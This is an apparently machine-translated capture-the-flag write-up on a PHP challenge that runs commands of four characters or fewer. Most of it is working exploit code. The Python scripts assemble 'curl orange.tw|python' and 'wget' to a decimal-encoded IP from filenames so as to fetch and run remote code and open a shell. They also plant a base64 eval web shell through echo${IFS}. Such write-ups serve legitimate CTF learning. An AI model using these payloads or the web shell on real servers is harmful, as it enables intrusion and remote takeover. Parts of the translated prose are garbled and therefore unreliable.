0x01 Source
<?php
$sandbox = '/www/sandbox/' . md5("orange" . $_SERVER['REMOTE_ADDR']);
@mkdir($sandbox);
@chdir($sandbox);
if (isset($_GET['cmd']) && strlen($_GET['cmd']) <= 4) {
@exec($_GET['cmd']);
} else if (isset($_GET['reset'])) {
@exec('/bin/rm -rf ' . $sandbox);
}
highlight_file(__FILE__);
Here direct release payload
import requests
from urllib import quote
payload = [
# 将 "g> ht- sl" 写到文件 "v"
'>dir',
'>sl',
'>g\>',
'>ht-',
'*>v',
# 将文件"v"中的字符串倒序,放到文件"x",就变成了 "ls -th >g"
'>rev',
'*v>x',
# 生成命令 "curl orange.tw|python;"
'>\;\\',
'>sh\\',
'>ba\\',
'>\|\\',
'>29\\',
'>1\\',
'>0.\\',
'>13\\',
'>8.\\',
'>16\\',
'>2.\\',
'>19\\',
'>\ \\',
'>rl\\',
'>cu\\',
# getshell
'sh x',
'sh g',
]
r = requests.get('http://52.197.41.31/?reset=1')
for i in payload:
r = requests.get('http://52.197.41.31/?cmd=' + quote(i) )
dir
Command and the like, used here, the reasondir
is becausels
the output is arranged in alphabetical, it is useddir
in the first row a*
Command is stitching up the current directory have to file as a command to perform
the following equivalent performeddir 'g>' ht- rev sl
, the output of these documents is
below the equivalent executeddir
, the output of all the files, but here was carried out to matchdir
the command file
So we execute *>v
, so the contents of the file v for g> ht- sl
us then execute> rev rev create a name for the file
and then execute * v is equivalent to the implementation of the rev v, v such file contents inside it upside down, and made g> ht- sl
changes to thels -th >g
-
Note that the file name can not
.
begin with, it may be a version of the problem, I'm on the ubuntu18.04 is possible -
Note the name of the file can not be repeated
-
Logically,
>ls\\\\
in order to generate a name for thels\
file, I ubuntu18.04, php7 and php5, apache2 does not reproduce the success, but the writeup is written above requires only a \, did not thoroughly understand, please big brother gets advice
You can refer to other payload
import requests
def exec_sub(cmd):
resp = requests.post("http://52.199.204.34/?cmd="+cmd).text
def exec(cmd):
for x in cmd:
print(x)
if cmd[-1]==x:
exec_sub(">%s" % x)
exec_sub("ls>>\\")
exec_sub("rm %s" % x)
elif x==" ":
exec_sub(">\\ \\")
exec_sub("ls>>\\")
exec_sub("rm ?\\")
else:
exec_sub(">%s\\" % x)
exec_sub("ls>>\\")
exec_sub("rm %s\\" % x)
exec_sub("sh \\")
exec("wget 1759614952")
Here directly to the IP caught replaced decimal
when I reproducible, I write directly to a rebound shell on the local 127.0.0.1, 127.0.0.1 of the decimal wget but I found the time to not return data, I again put the on vps, can be found in the returned data, this is also not quite understand how it is, please big brother gets advice ~ ~
In addition, we can also write directly to word
echo PD9waHAgZXZhbCgkX0dFVFsxXSk7|base64 ‐d>1.php
But we need to note is that there are two spaces, so we will need a space equivalent replaced with other characters
so:
echo${IFS}PD9waHAgZXZhbCgkX0dFVFsxXSk7|base64 ‐d>1.php
payload:
#!/usr/bin/python
# ‐*‐ coding: UTF‐8 ‐*‐
import requests
url = "http://192.168.61.157/?cmd={0}"
print("[+]start attack!!!")
with open("payload.txt","r") as f:
for i in f:
print("[*]" + url.format(i.strip()))
requests.get(url.format(i.strip()))
#检查是否攻击成功
test = requests.get("http://192.168.61.157/1.php")
if test.status_code == requests.codes.ok:
print("[*]Attack success!!!")
In addition This question also need to read data from the database, but the database does not echo, so I can use what method takeaway, save the results to a file, and then get access to the file data content
https://www.jianshu.com / p / 5aad993c793e
here introduces a number of other methods, benefit ~~